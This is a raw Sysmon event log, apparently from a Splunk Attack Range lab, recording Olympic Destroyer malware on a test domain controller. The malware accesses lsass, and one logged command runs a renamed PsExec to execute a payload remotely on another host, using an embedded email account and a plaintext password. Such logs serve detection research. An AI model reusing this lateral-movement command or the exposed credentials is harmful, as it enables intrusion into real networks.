Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219645Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:51.226{4F8D34B0-154B-6216-CF04-000000003902}1416C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:52.700{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F409A682F7979DC459FEC70168B99212,SHA256=298D08F4ADE8DBA54BF4A5BB4B746FC447ED531F189801ACAE6E97A284A4BD6B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219661Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:50.808{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx54094-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219660Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:52.600{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA889F29CDFB236A5295410164E51EFB,SHA256=FBD263819132942154EFA892D226D19D319AE8B391AF1EB99DB0CB7A55C4A06F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:49.706{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49239-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000219659Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:52.272{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E02EBFC5AD7EF896A6B2128ED32B92C,SHA256=54B934F13B65A028F992E06039D8FB8DF6ACF0E3536DC5BD3BEA992AD142A419,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.867{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-154D-6216-C506-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.867{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-154D-6216-C506-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000295506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:06:53.836{C8EA50B7-154D-6216-C506-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000295505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.752{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76A7F36C9389DBEB13C064520629B3E9,SHA256=39163B8BB893EB4E8952E3F404F208F98E45FDCE7F395C2BDBEBDEBDCB3E9961,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.730{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-154D-6216-C606-000000003802}6260C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.714{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-154D-6216-C606-000000003802}6260C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219662Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:53.616{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCF9F992B24B7CA1492B572DC7B6DF34,SHA256=DBA154724EC28610D5EBFF689433C3F2F5ABC9AC4455AA999C8908FEB8BCB18A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.668{C8EA50B7-154D-6216-C606-000000003802}62606008C:\Windows\system32\conhost.exe{C8EA50B7-154D-6216-C506-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.599{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-154D-6216-C606-000000003802}6260C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.599{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-154D-6216-C606-000000003802}6260C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.468{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-154D-6216-C506-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.452{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.452{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.452{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.452{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.452{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-154D-6216-C506-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000295493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.459{C8EA50B7-154D-6216-C506-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.1 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000295492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.452{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-154D-6216-C506-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000295491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:53.452{C8EA50B7-1536-6216-C106-000000003802}7008C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000295509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:54.755{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46EF6FAD2DD56CCA009EB148C0A0954E,SHA256=970CB7F87C225A5A5787CB509CE2D2B8903B60458CEC052A3749EF6B92DD361B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219664Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:54.631{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75231DF3DA76BB13D9E73E48DA45CAB3,SHA256=396B0C6CA5E103D1B864D3AD885C408ED5FA3AA58C57178168C7A02D0021F32A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219663Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:54.022{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4064321794CFCD1BDA1CDDC03A73569F,SHA256=10447B8751FCC18C198C9704A2AB987E95FF0AF8104E40000E83D0BAA3492F20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:55.769{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D576046F64B83A55BFCCA37453C173E,SHA256=A46E1771D1A8C2BEA4DC46C09116250F4118DF39E119BBE16798868615A98ECF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219666Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:52.627{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51531-false10.0.1.12-8000- 23542300x8000000000000000219665Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:55.647{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE264C6290B67967FAF02DD155F23194,SHA256=F0932C8AC495FF64E8C0F1EBDF392188769A8E12E09C8BDB5BDE67C9294F8410,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219667Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:56.662{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79DC30E54117EF7D56F4838C7D32DFFC,SHA256=E01BDDC9E55E9CDC3A1C4E43378DBE6A76B65939A9682DBBAD52A15C64BE2C48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:56.800{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F334B0503BB2FCB71A59A957789BB72,SHA256=EBEF3340310C1EF9A905C2D6C9A1E5A7AF423259DEC3C7D3C23A112B7461EAB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:57.838{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA1395A323315655368A8A2023C238BF,SHA256=4DF70E3D514083FFA52630316E79A09F8A384C7811D4F8FE87D0877BFFF51480,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219669Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:57.678{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8264EAFC690158197551969A56DC93F5,SHA256=4E8808DFADB1C59D2E37E9E2F575B0B70F8BEBD77C7666F469A42192875C8C39,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219668Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:54.257{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx56650-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 354300x8000000000000000295512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:55.605{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49242-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:58.853{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0980056C9113437D4DD4AE5E3C0055D,SHA256=C2A3E4FD81A6D0E7E2663285190ABDAF64DA436DFE6BC40780BEA0D66A6883F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219671Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:58.678{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7BF029F20B96E6C4E229FF3FCAAB9F6,SHA256=19BBF1FC453CBEBFE42CFC04F6B3B53CC0198708364544D9A43582EABCFCB3AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:58.100{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=149C41B99C94D02FA52AFBBAD5CE69E5,SHA256=83C234877EE05542CB25398BDE0093A7B156B000FB2A74F5C49A587DA4435F3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219670Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:58.115{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 